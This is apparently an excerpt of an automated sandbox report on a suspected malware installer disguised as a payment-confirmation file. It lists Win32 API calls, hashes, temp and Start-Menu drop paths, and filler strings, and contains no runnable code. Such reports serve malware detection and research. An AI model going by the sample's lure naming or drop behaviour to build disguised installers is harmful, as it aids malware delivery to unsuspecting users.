                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                  • String ID: : Completed$AB@$N$open
                  • API String ID: 3615053054-1317861079
                  • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                  • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                  • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                  • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                  APIs
                  • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                  • wsprintfA.USER32 ref: 00405C7E
                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                  • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                  • CloseHandle.KERNEL32(00000000), ref: 00405D76
                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                  • API String ID: 1265525490-3322868524
                  • Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                  • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                  • Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                  • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                  APIs
                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32(?,?), ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F
                  • API String ID: 941294808-1304234792
                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                  APIs
                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
                  • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                  • CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
                  • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206
                  Strings
                  • *?|<>/":, xrefs: 004061CE
                  • "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 004061C0
                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040617D, 00406182
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                  • API String ID: 589700163-908710460
                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                  • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                  • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                  APIs
                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                  • GetSysColor.USER32(00000000), ref: 004041CD
                  • SetTextColor.GDI32(?,00000000), ref: 004041D9
                  • SetBkMode.GDI32(?,?), ref: 004041E5
                  • GetSysColor.USER32(?), ref: 004041F8
                  • SetBkColor.GDI32(?,?), ref: 00404208
                  • DeleteObject.GDI32(?), ref: 00404222
                  • CreateBrushIndirect.GDI32(?), ref: 0040422C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                  • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                  • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                  APIs
                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                    • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                  • String ID: 9
                  • API String ID: 1149667376-2366072709
                  • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                  • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                  • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                  • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                  • String ID:
                  • API String ID: 3294113728-0
                  • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                  • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                  • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                  • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritelstrlen
                  • String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                  • API String ID: 1453599865-3369475305
                  • Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                  • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                  • Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                  • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                  APIs
                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                  • GetTickCount.KERNEL32 ref: 00402D51
                  • wsprintfW.USER32 ref: 00402D7F
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                    • Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C87B,00000064,0003267C), ref: 00402D11
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                  • String ID: ... %d%%
                  • API String ID: 722711167-2449383134
                  • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                  • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                  • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                  • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                  APIs
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                  • GetMessagePos.USER32 ref: 00404A7F
                  • ScreenToClient.USER32(?,?), ref: 00404A99
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                  • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                  • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                  • wsprintfW.USER32 ref: 00402CCF
                  • SetWindowTextW.USER32(?,?), ref: 00402CDF
                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
